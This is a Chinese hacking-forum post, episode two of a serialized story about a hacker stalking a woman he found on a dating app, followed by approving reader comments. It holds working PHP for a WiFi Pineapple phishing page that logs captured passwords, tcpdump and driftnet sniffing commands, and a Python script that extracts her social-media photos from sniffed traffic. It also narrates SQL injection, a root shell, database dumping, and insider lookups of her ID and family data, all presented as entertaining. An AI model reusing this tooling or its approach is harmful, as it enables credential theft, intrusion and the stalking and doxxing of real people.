卧薪尝胆只为你(屌丝黑客"追"妹记第二集)
「好大的一朵菊花哟~」
-----------------------------
< / Scorpion echo ‘世界由我来守护’>
PS:大家当小说看不要以技术的眼光去评判,不当之处请忽略勿喷 内行人看门道,外行人看热闹,请不要再教我如何把妹了,就当一个热闹和故事来看就行了
精彩回顾:第一集地址https://www.t00ls.com/thread-31253-1-1.html
第一章:“约炮神器”帮我找到了她
在上一集中Only成功的吓走了妹子,妹子回去对电脑进行了全面的杀毒,最终Only的权限还是掉了,他有一点点的失落,只盼着有一天能和她在人群中相遇,就想问她一句话“为什么要杀毒”
这天Only跟平常一样熟练的打开各种社交软件在搜附近人,什么QQ啊微信啊,陌陌啊,探探啊,派派啊都被Only玩的了如指掌,突然看到这么一个消息,
Only表现的是异常兴奋啊,这不就是自己的"梦中情人"
“0.75KM”Only拿这手机出去寻找着,最终确定了妹子所在的位置,Only高兴的跑了回来,带上所有的装备前往目的地,北方的3月天气里,晚上吹着小风,有点冷飕飕的感觉,Only带了好几个装逼神器,所用的装备有
1、军区大衣加手套一双,口罩一个,
2、航拍飞行器,
3、WiFi Pineapple
4、3G无线网卡
5、一个超大功率的无线网卡卡皇
7、笔记本一套
听到这我表示很诧异,这货是预谋已久啊,从装备上来看果然是黑阔,Only来到了妹子所在的单元楼下,找了一个阴暗的角落,把无线网卡插到WiFi Pineapple的USB上后进行设置
设置完后把WiFi Pineapple的无线密码改成了conspiracy,然后配置了一个钓鱼站点,他用的是WiFi Pineapple里面的DNS欺骗当然我们可以用别的方法来欺骗
意思就是修改一个网页把提交的表单修改和error.php里一样然后我们在我们修改的网页中输入账号密码会提交到error.php里然后保存到/tmp/pineapple-phish.log里面,而redirect.php就是我们DNS欺骗用到的,当我们输入的网址内含有COM会跳转到WiFi Pineapple - Login.htm(我们修改的网页)
redirect.php:
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "com")){
header('Status: 302 Found');
header('Location: WiFi Pineapple - Login.html');
}
require('error.php');
?>
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("/tmp/pineapple-phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body>
</body></html>
PS:做的有点丑,大家凑合看就行了
Only做好后开启了DNS欺骗模式
然后将菠萝派安置到了飞行器上,笔记本连上卡皇后再链接上菠萝派的wifi(此目的是因为飞行器飞高后wifi的范围丢失,所以用的卡皇)
这时候看妹子距离我不过30M左右,操控这飞行器飞到2-3楼的中间
然后Only在陌陌中告诉了妹子wifi名称和密码,看到消息已读,Only邪恶的笑了,不一会妹子回复了个"谢谢"
一股股寒风吹过,Only不停的刷新着文件夹希望出现期盼中的pineapple-phish.log,难得妹纸没连上?
确实有连上啊,2个设备.151是我,.24肯定是妹纸了,但还是仍不住在陌陌上问了下妹纸,
“连上了吗?”
“恩”
Only疑惑为什么不上网呢,难得妹纸就是只在聊天看视频? Only想向妹纸推送一个网页自动弹出,但是又想起上次的结果,这次一定要忍住,决不能打草惊蛇,Only默默的念着,不知不觉已经到了晚上8点,一股股寒风袭来,Only不经意的打了个颤,有点迷糊了,差点睡着了,刷新了下文件夹,Only喜出望外,看到了梦寐以求的pineapple-phish.log
然后一看手机,看到了妹子发来的信息
“为什么打不开网页,一直提示让我认证”
Only立马回复
“应该是路由出错了,我重启下”
妹子没有怀疑,Only立马关掉了DNS欺骗,差点吓死了,Only默念着,出了一头的冷汗,Only立马搜索微信验真伪,看来是真的,知道了妹子的QQ,手机以及微信,Only本想着以及得到了想要的赶紧撤,谁知道好奇心太重,开启了URL Snarf (kali同理),于是准备一探虚实
PS:以下是本地手机演示
看到这一排排数据,Only显得越发的高兴
然后他把数据拷贝下来准备读取数据
PS:这是视频
当然还有一些小视频啊,语音啊 空间的说说啊 快手之类的,大家自由发挥吧
du.py:
import re
text = open("1.txt", "r")
png = open('text3.html','w')
while True:
line = text.readline()
if 'mmsns.qpic.cn' in line:
pat = re.compile('GET(.*)?tp=',re.S) # 微信圈的图片
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
if 'img.momocdn.com/feedimage/' in line:
pat = re.compile('GET(.*?)webp',re.S) # 陌陌圈的嗅探
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'jpg></img>'
print text3
png.write(text3)
if 'nipic.com' in line:
pat = re.compile('GET(.*?) HTTP',re.S) # QQ相册
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
text.close()
png.close()
读取一个指定pcap数据包中的图片:
driftnet -f /home/dump_1443200994.pcap -a -d /home/
tcpdump -i wlan0 -nn -w /mnt/sda1/tcpdump.cap port 80 &
也许是因为Only太无聊了吧,看了一会也没有发现什么妹子的自拍视频之类的
额外的还是有一些失落的,收拾了下Only准备回家了,这次Only并没有视图这去获取权限什么的,只是简单的得到了一些信息,回去后妹子发来了信息,问为什么没网了,
Only回答到 “我要睡觉了”,
妹子无奈的"哦”了一下
也没有聊了起来,因为这样的社交软件上献殷勤势必会引起妹子的反感的
第二章:为了你我做什么都可以
Only回去后在各种裤子查起了妹子的QQ号,手机号之类的,各种百度,搜狗 谷歌,最终眼睛一亮,一网站出现了妹子的手机号,点开后原来是某某大学的网站,原来是个舞蹈老师,上面清楚的写着在那次比赛中得了第一名,名字 电话,Only又邪恶了
“难不成又要我日站?我勒个X”
想想都觉得累
打开网站翻了翻果然有
既然旁站好几个,那就柿子就挑软的捏
Only拿出了WebRobot爬了下站
神器就是神器啊果然很强,但是效果还不是很明显,在官方上找啊找啊找,点开新闻中心后是这样子的
难不成把参数隐藏了
继续拿神器来扫下
点开抓取链接 果然被猜到了 是真的
全部发送注入扫描里
看来是存在注入的,那已经成功了一半了
本想着手工拿下 可以一注入 不管输入什么就弹回去了,用什么萝卜头啊之类的也没用,卧槽,看来还是得神器来搞
果然神器就是神器,不一会出现了Only想要的东西
然后登录后台
“ 卧槽,这么简单,搞毛啊,为什么啊测试版,这算个毛啊 %¥@#!@# ”
Only仍不住的骂了起来
但是还是静下心来,右手掏进右边口袋,取了一盒东西出来,掏出一根白色的
类似柱状的物体放在嘴里叼着,左手插入左边口袋取出打火机,右手成弯弓状态护住左手打火机点燃了哪根柱状物体,深吸一口,美妙极了!
仔细的看了看网站,最终还是发现了一个突破口
“ 卧槽,什么情况,玩我呢,这么简单的站居然有这么傻逼的洞!害的我还白失落了一会 ”
Only拿到shell后 root权限
这站让Only一头冷汗,好让人蒙羞啊,Only激动不已,这管理果然是SB,从后台的那几个"测试版"大字上就猜到了,
“看来这是老天要帮我啊”
Only登上服务器脱下裤子
日了个底朝天,最终Only想要的还是工资查询的裤子
Only是什么都想干,什么都想挑战,这时候Only想这么SB的管理员难道注入可以直接写shell?又一次得到了验证
拿到数据库后,Only搜索了下名字,得到身份证后,这下Only发大招了,把查出来的身份证号发给了自己的2个朋友,
一个在运营商那里,一个是警察,得到了以下信息(人生在世,没有几个各行各业的朋友,还活什么,必要时可以像这样帮下忙)
确定了妹子的手机号和自己得到的是同一个,也没有其他手机号,也确定了妹子的个人信息和家庭信息
但是Only为什么要得到这些信息?
得到这些信息后他又要干什么呢?
Only又会做一些什么疯狂的事情呢?
和妹子会有什么奇妙的故事发生呢?
这一切的一切都成了迷
想知道答案的话
尽情期待下一集
<Only失忆了>
自评TCV值(5)
评论230次
有点66666666666666666,学学知识
学xi了,祝楼主逆袭成功
思路很好呀,
思路很吊,再加上这么高端的设备!屌的没话说!再配上这精美绝伦的故事情节!牛逼!
备 XXXXXXX 号
你们都是我见过最屌的
备 XXXXXXX 号
又出续集了,当当黑客小说看看还是不错的
这个姿势很正确啊,思路很不错呀,
我是来看追妹的。。。。
然后 你俩 谈恋爱了么
不错 写的精彩 很细心! 期望下集更精彩!
很认真的看完了,屌丝一定可以逆袭的
我都不敢相信这是真的还是假得了 牛掰!
看了两集了
飞行器到2楼开wifi也是没谁了
为什么你们身边都有妹子,我都怕搞到汉子
运气和人脉很重要啊
哈哈哈,这技术是够厉害的,没有吹嘘的成分ba
某安就已经把无人机这些用于临侦了
为什么可以猥琐.........